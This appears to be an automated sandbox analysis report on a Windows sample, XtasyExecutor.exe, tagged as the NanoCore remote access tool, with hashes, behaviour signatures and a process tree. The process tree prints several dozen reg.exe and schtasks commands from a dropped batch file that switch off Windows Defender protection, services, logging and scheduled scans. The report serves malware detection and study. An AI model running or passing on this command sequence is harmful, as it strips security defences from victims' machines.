Analysis

  • max time kernel
    47s
  • max time network
    59s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17-12-2024 18:58

General

  • Target

    XtasyExecutor.exe

  • Size

    202KB

  • MD5

    20bd0480bb862bd1d073477a87aede81

  • SHA1

    3c7c72fc3c1bec023386ac6ed14ad5cb785fe4ce

  • SHA256

    548529c38438f4a9aea915448e183f24d4ddbe793a86090075775a154d59f067

  • SHA512

    6b4817a7921bb62bbaf6835a3948a1811914f652f5f6ad86fe0b52376b6347d180488c3de4f02ba8ec962c45c5b4d6ad91eba11441989bbb42dab2863dfaa766

  • SSDEEP

    6144:gLV6Bta6dtJmakIM5E/hBp4OnvF3ZO2hdi:gLV6BtpmkJBprnvF3AWi

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Nanocore family
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Modifies Security services 2 TTPs 4 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\XtasyExecutor.exe
    "C:\Users\Admin\AppData\Local\Temp\XtasyExecutor.exe"
    1⤵
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4216
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ba85a293.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1976
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\612153ef.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3164
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3436
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4752
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1568
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1744
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2320
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:2488
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:4016
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:2312
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:32
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:4104
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:652
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1436
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1920
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3200
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4376
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5108
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2384
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2184
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4584
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4532
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2340
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1280
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1828
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1520
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5100
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3996
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:824
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:244
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:2548
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:3448
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies security service
        • System Location Discovery: System Language Discovery
        PID:900

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\612153ef.bat

    Filesize

    3KB

    MD5

    10e9d7377b7fd4df43145ae4c8b136b3

    SHA1

    4002ba143ff336f631d36c6afd93464822ba541e

    SHA256

    1b1b51dbe669925f941f0b3e04c7d00f29af6746179a7b72a58391720cd23da1

    SHA512

    c28b439ab8fdc3e8da7217250b5f13be1613b0acf5677758d65fe7e46f0abdea08db73ecce5ca38fb88c8c25064fddc04e1f23d4d70058d27a0ba23a980fe885

  • C:\Users\Admin\AppData\Local\Temp\ba85a293.bat

    Filesize

    1KB

    MD5

    17d9544ded65779dcdaf02d77fbdde99

    SHA1

    cd29db919a6abdd50d18de9c0215904350a8455d

    SHA256

    d3f6297e3ca5b593fdefeb24619324111ca2c1bc984af27414bbcb47f9e269e0

    SHA512

    709ed458c1433c0686828406eaf1e142704f18bca52db846af4c8117f0d81b0975af071c89b45fa7923bd6a2900066d3863e7703357f26906dec630e25c60d94

  • memory/4216-0-0x0000000074991000-0x0000000074992000-memory.dmp

    Filesize

    4KB

  • memory/4216-1-0x0000000074990000-0x0000000074F41000-memory.dmp

    Filesize

    5.7MB

  • memory/4216-2-0x0000000074990000-0x0000000074F41000-memory.dmp

    Filesize

    5.7MB

  • memory/4216-5-0x0000000074990000-0x0000000074F41000-memory.dmp

    Filesize

    5.7MB

  • memory/4216-7-0x0000000074990000-0x0000000074F41000-memory.dmp

    Filesize

    5.7MB

  • memory/4216-10-0x0000000074990000-0x0000000074F41000-memory.dmp

    Filesize

    5.7MB

  • memory/4216-11-0x0000000074990000-0x0000000074F41000-memory.dmp

    Filesize

    5.7MB